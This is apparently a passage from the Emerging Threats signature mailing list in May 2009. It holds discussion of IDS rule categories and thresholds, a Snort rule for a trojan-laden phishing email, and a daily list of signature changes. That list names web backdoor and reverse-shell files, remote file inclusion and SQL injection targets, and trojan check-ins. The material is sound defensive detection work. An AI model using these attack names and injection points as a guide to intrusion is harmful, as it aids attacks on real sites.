        2008189 || ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From frank at knobbe.us  Mon May 11 21:00:23 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Mon, 11 May 2009 20:00:23 -0500
Subject: [Emerging-Sigs] RealVNC sigs 2002922 + 2002920
Message-ID: <1242090023.7228.257.camel@localhost>

Gentlemen,

SIDs 2002922 + 2002920 are in the exploit category, even though they
carry a ET POLICY label. Now, I'm aware there was that old RealVNC issue
a long while back. We should either move those sigs from EXPLOIT to the
POLICY group, or perhaps remove these sigs altogether.

Thoughts?

Cheers,
Frank





-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090511/01cfabba/attachment.bin

From veerendragg at secpod.com  Tue May 12 08:05:02 2009
From: veerendragg at secpod.com (Veerendra GG)
Date: Tue, 12 May 2009 17:35:02 +0530
Subject: [Emerging-Sigs] Signature on Malware E-mail
Message-ID: <4A0965EE.3040205@secpod.com>

# 12/05/2009 WorldPay Card Transactions - Trojan horse

alert tcp  $EXTERNAL_NET any -> $HOME_NET 25 (msg:"WorldPay Card
Transactions - Trojan"; flow:established,to_server; content:"|0d
0a|Subject|3a| WorldPay CARD transaction Confirmation"; nocase;
content:"WorldPay_CONFR.zip"; nocase; classtype:trojan-activity;
reference:url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/;
sid:9038; rev:1;)

-- 
regards,
Veerendra GG
http://www.secpod.com




From frank at knobbe.us  Tue May 12 14:22:47 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 12 May 2009 13:22:47 -0500
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <4A0833B9.1040808@jonkmans.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
	<20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
	<4A0833B9.1040808@jonkmans.com>
Message-ID: <1242152567.76343.20.camel@localhost>

On Mon, 2009-05-11 at 10:18 -0400, Matt Jonkman wrote:
> Good ideas Jack. I did that when I committed. One sig for individual
> hits, and a threshold to indicate some brute forcing.

The threshold is broke. It's thresholded on the source, not destination
as required for this sig.

I'm gonna fix in a sec.

-Frank

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 188 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090512/edc22c9b/attachment.bin

From jonkman at jonkmans.com  Tue May 12 14:24:15 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 12 May 2009 14:24:15 -0400
Subject: [Emerging-Sigs] Signature on Malware E-mail
In-Reply-To: <4A0965EE.3040205@secpod.com>
References: <4A0965EE.3040205@secpod.com>
Message-ID: <4A09BECF.6080406@jonkmans.com>

Good sig. I'll put it in current events for now, as it'll likely morph
in the future.

Thanks!

matt

Veerendra GG wrote:
> # 12/05/2009 WorldPay Card Transactions - Trojan horse
> 
> alert tcp  $EXTERNAL_NET any -> $HOME_NET 25 (msg:"WorldPay Card
> Transactions - Trojan"; flow:established,to_server; content:"|0d
> 0a|Subject|3a| WorldPay CARD transaction Confirmation"; nocase;
> content:"WorldPay_CONFR.zip"; nocase; classtype:trojan-activity;
> reference:url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/;
> sid:9038; rev:1;)
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Tue May 12 14:27:22 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 12 May 2009 14:27:22 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <1242152567.76343.20.camel@localhost>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>	
	<20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>	
	<4A0833B9.1040808@jonkmans.com>
	<1242152567.76343.20.camel@localhost>
Message-ID: <4A09BF8A.8030909@jonkmans.com>

Ahh, ya. You're right. my mistake.

Matt

Frank Knobbe wrote:
> On Mon, 2009-05-11 at 10:18 -0400, Matt Jonkman wrote:
>> Good ideas Jack. I did that when I committed. One sig for individual
>> hits, and a threshold to indicate some brute forcing.
> 
> The threshold is broke. It's thresholded on the source, not destination
> as required for this sig.
> 
> I'm gonna fix in a sec.
> 
> -Frank
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From pepperjack at afferentsecurity.com  Tue May 12 15:47:59 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Tue, 12 May 2009 14:47:59 -0500
Subject: [Emerging-Sigs] RealVNC sigs 2002922 + 2002920
In-Reply-To: <1242090023.7228.257.camel@localhost>
References: <1242090023.7228.257.camel@localhost>
Message-ID: <20090512144759.vqqacfbwc0ssocgc@mail.afferentsecurity.com>

Quoting Frank Knobbe <frank at knobbe.us>:

> SIDs 2002922 + 2002920 are in the exploit category, even though they
> carry a ET POLICY label. Now, I'm aware there was that old RealVNC issue
> a long while back. We should either move those sigs from EXPLOIT to the
> POLICY group, or perhaps remove these sigs altogether.

I lobby for putting them into the POLICY group.  The rule does not  
detect an exploit, it detects an out-of-date or misconfigured VNC  
(policy).

jp



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From emerging at emergingthreats.net  Tue May 12 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 12 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090512200010.EB7A14504E@goliath.jonkmans.com>


[***] Results from Oinkmaster started Tue May 12 16:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009347 - ET TROJAN Tigger.a/Syzor Checkin (emerging-virus.rules)
 2009348 - ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan (emerging.rules)


[///]     Modified active rules:     [///]

 2001621 - ET WEB Exploit Suspected PHP Injection Attack (emerging-web_sql_injection.rules)
 2001810 - ET WEB Explit PHP remote file include exploit attempt (emerging-web_sql_injection.rules)
 2002838 - ET WEB_SPECIFIC Google Search Appliance browsing the Internet (emerging-web_sql_injection.rules)
 2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules)
 2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules)
 2007611 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 (emerging-virus.rules)
 2007612 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 (emerging-virus.rules)
 2007613 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 (emerging-virus.rules)
 2007614 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 (emerging-virus.rules)
 2007950 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body (emerging-virus.rules)
 2008142 - ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) (emerging-virus.rules)
 2008278 - ET TROJAN Generic Raider Obfuscated VBScript (emerging-virus.rules)
 2008379 - ET TROJAN Swizzor Checkin (kgen_up) (emerging-virus.rules)
 2008973 - ET TROJAN onmuz.com Infection Activity (emerging-virus.rules)
 2009126 - ET TROJAN Possible bot C&C Checkin (emerging-virus.rules)
 2009156 - ET TROJAN Unknown Dropper Checkin (emerging-virus.rules)
 2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
 2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
 2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
 2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
 2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
 2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
 2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
 2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
 2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
 2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
 2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
 2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
 2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
 2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
 2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
 2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
 2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
 2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
 2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
 2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)
 2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)
 2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules)


[///]    Modified inactive rules:    [///]

 2001716 - ET WEB_SPECIFIC IDN url seen.. (emerging-web_sql_injection.rules)


[---]         Removed rules:         [---]

 2008505 - ET MALWARE Adaware.BarACE Checkin and Update (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (60):
        2001621 || ET WEB Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET WEB_SPECIFIC IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET WEB Explit PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
        2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET WEB EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2007611 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009345
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346
        2009347 || ET TROJAN Tigger.a/Syzor Checkin
